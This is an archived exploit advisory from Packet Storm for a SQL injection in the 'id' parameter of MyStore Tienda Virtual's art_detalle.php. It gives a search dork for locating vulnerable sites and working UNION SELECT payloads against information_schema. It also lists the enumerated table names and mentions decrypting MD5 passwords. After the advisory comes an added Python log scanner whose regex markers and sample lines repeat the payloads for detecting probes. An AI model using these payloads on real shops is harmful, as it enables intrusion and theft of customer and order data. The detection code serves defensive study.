
MyStore Tienda Virtual SQL Injection

03 Jan 2012 00:00:00 | Reported by Arturo Zamora | Type: packetstorm | Source: packetstormsecurity.com

MyStore Tienda Virtual SQL injection, reported by Arturo Zamora. Risk: high. The `id` parameter of `art_detalle.php` is injectable, which exposes database information; the advisory also notes insecure password decryption (MD5).

Code
`========================================================================================  
| # Title : SQL Injection MyStore Tienda Virtual |  
| # Author : Arturo Zamora |  
| # email : [email protected] |  
| # Date : 02/01/2012 |  
| # Verified : yes |  
| # Risk : High |  
| # Published: |  
| # Script : MyStore Tienda Virtual http://www.mystore.com.mx/ |  
| # Dork : inurl:art_detalle.php?id= |  
====================== zeux0r 2012 =================================  
Exploit :  
======================  
  
http://localhost/path/art_detalle.php?id={sqli}  
  
======================  
Example:  
======================  
  
http://localhost/path/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13--  
  
http://localhost/path/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables--  
  
======================  
dbs:  
======================  
articulos   
articulos_nivel3   
articulos_relacionados   
articulos_secciones   
atajada   
atajadausa   
ayuda   
ayudausa   
banners   
banners_conteo   
banners_lateral   
banners_lateralusa   
basket   
campania   
clientesclientes_envio   
clientes_facturacion   
colores   
comentario   
comisionistas   
comisionistas_hits   
comisionistas_modulos   
contacto   
descuentos   
descuentos_cruzados   
descuentos_temp   
especificacion   
home   
homeusa   
justin   
justinusa   
mensajeria   
mensajeriausa   
mixer   
newsletter   
newsletter_mensaje   
nivel1   
nivel2   
nivel3   
parametros   
paypal  
pedidos   
pedidos_detalle   
pedidos_detalleusa   
pedidosusa   
remate   
remateusa   
secciones   
shopper  
sol_info   
talisman   
tallas   
ticker   
tickerusa   
visitas  
  
======================  
Information :  
======================  
  
password decrypt md5  
  
======================  
  
I Love U Pumosita  
  
www.insecure.org.mx  
  
================================ Mexican shotos ========================================  
Greetz : * zer0-zo0rg * Bucio * Xoxonaizer * Maztor *  
-------------------------------------------------------------------------------------------  
  
`
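
A defender-side check for the requests shown in the advisory, as an added example that is not part of the original advisory or of MyStore's code: it flags access-log hits on `art_detalle.php` whose `id` is not a plain integer. The combined log format, the sample lines, and the assumption that legitimate `id` values are unsigned integers are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request target inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Markers taken from the advisory's example requests.
MARKERS = {
    "union_select": re.compile(r"\bunion\b.*\bselect\b", re.I | re.S),
    "information_schema": re.compile(r"information_schema", re.I),
    "sql_comment": re.compile(r"--|#|/\*"),
}

# Constructed sample log lines (documentation IP ranges, made-up sizes).
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Jan/2012:10:00:01 +0000] "GET /path/art_detalle.php?id=42 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [03/Jan/2012:10:00:05 +0000] "GET /path/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13-- HTTP/1.1" 200 4811',
    '198.51.100.9 - - [03/Jan/2012:10:00:09 +0000] "GET /path/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables-- HTTP/1.1" 200 9034',
    '203.0.113.7 - - [03/Jan/2012:10:00:12 +0000] "GET /path/index.php?id=7 HTTP/1.1" 200 1000',
]

def inspect_line(line):
    """Return (id_value, reasons) for a suspicious art_detalle.php hit, else None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith("/art_detalle.php"):
        return None
    # parse_qs percent-decodes and turns '+' into spaces, like PHP's $_GET.
    for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
        if re.fullmatch(r"[0-9]+", value):
            continue  # assumption: a legitimate id is an unsigned integer
        reasons = ["non_numeric_id"]
        reasons += [name for name, rx in MARKERS.items() if rx.search(value)]
        return value, reasons
    return None

def scan(lines):
    """Return [(line_number, id_value, reasons)] for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        hit = inspect_line(line)
        if hit:
            hits.append((number, *hit))
    return hits

if __name__ == "__main__":
    for number, value, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: id={value!r} -> {', '.join(reasons)}")
```

The same strict-integer rule, applied in the application before the value reaches the query, is what closes the hole; the log check only shows whether the parameter has been probed.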
